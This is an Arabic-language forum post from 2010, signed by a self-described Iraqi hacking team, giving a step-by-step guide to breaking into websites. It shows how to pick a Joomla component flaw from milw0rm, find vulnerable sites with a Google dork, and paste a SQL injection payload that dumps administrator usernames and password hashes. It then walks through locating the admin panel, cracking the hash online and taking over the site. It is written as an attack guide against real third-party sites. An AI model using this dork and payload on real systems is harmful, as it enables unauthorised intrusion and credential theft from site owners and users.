منتديات شلون انساك
مرحبا بك عزيزي الزائر. المرجوا منك أن تعرّف بنفسك و تدخل المنتدى معنا. إن لم يكن لديك حساب بعد, نتشرف بدعوتك لإنشائه
الادارة
علي تكنو
ali.techno.stu@gmail.com
07711007824


مجموعة ثقافية ترفيهية اجتماعية
 
الرئيسيةالرئيسية  قائمة الاعضاءقائمة الاعضاء  المجموعاتالمجموعات  التسجيلالتسجيل  دخولدخول  

اهلا وسهلا بك زائرانا الكريم في منتدياتنا يارب تقضي وقت ممتع ومفيد اخوكم علي تكنو المدير العام لمنتديات شلون انساك


شاطر | 
 

 شـرح اختراق من موقع milw0rm 2010

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
جليس القمر
عضو لامع
عضو لامع


عدد المساهمات : 447

مُساهمةموضوع: شـرح اختراق من موقع milw0rm 2010   السبت 16 يناير 2010, 7:34 am

ســـلاـــــم عليكــــمـ

احبـــ||||||||||بــــ قلبـي
شلونكمـ نشـأء الله زنيـــنـ

شرح الاختراقـــ من الموقـــعـ [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


شرح من فريق القرصنة في العـراق ... 2010

================================
اولـ شي ادخل على الموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
شووووووف الصورة _____


والان دخلنة الي موقع الميل وروم
ندخل ع قــسم
[ web apps ]
ملاحضة شــباب
مرات ندخل للموقع نلكي ثغرات بلون غير لون الاخضر الي معروضة هيج
نلكاهة لون اصفر
يعني ثغرة جديدة

شووووف الصوـورهـ


راح اختـار هـاي ثغرة تاريخ قديم ..... بس مو اهواية شغالة مية مية
شووف الصورة


بعد فتح الثغرة شووووف شطلعلكـــ طبعـا انتـا راح دووووخ
ما تعرف وين كود البحث وين الاستغلال الاختراق وووووصول على اسم المدير رقم ...
شوووف الصورة للتوضيحـ



Author : v3n0m
اسم مكتشف الثغرة
Author
[+] Contact : v3n0m666[at]live[dot]com
الاميل الخاص فيه
شــباب هاي معلومات المكتشف
والثغرة في سكربت
Joomla Component
شــباب هسة الي يهمنة من هل قصة كله نبحث عن الدور والاستغلال ونطبق اول شي ندور على
dork البحث في محركات البحث العالمية
Google Dork : inurl:"com_gameserver"
دورك البحث نكتبة في محرك البحث كوكل
شوووف الصورة


ما شاء الله ثغرة كثيرة هع هع هع
بعد ما نكتب الدور البحث في كوكل
هسة نجي ناخذ معنا الاستغلال ونجرب في موقع موقع
هذا الاستغلال
Exploit:
index.php?option=com_gameserver&view=gamepanel&id= 999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

طبعـا افتح موقع كلهـا جرب واحد واحد
الى ما يطلع عندك الخطـا
يطلع عندك
اليوزر الادارة وباس ورد الادارة اوكــي
ورهـا تروح
تفتح موووقع دور على مسـار لوحة تحكم
راح انطيك مسـار
يكوون

admin
او
administratcr

اوكـي
ورهـا تطلع لوحـة التحكمـ
بس عندك باس ورد مشفر روح على نفس الموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
شوووف الصورة


او
ا الموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

بعدهـا نتدخل الموقع روح العب بة بكيفكـ

تحياتي الكم احباب قلبي
فريق القرصنة في العراق
تم النقل بواسطة صديقكم ابو شاكي

_________________
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
شـرح اختراق من موقع milw0rm 2010
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» أدم رافتش = مصور الغرائب يصور في اخطر المناطق في العالم حيث الوحوش البرية ووحوش الماء
» انواع الطراح
» تطريز الضرس المغربي
» اغنيه لعيون المدريدين
» موضوع علمي غريب عن القفاز العجيب

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات شلون انساك :: أقسام الكومبيوتر - Computer Section :: منتدى الهكر والاختراق والحماية[ Security ]-
انتقل الى: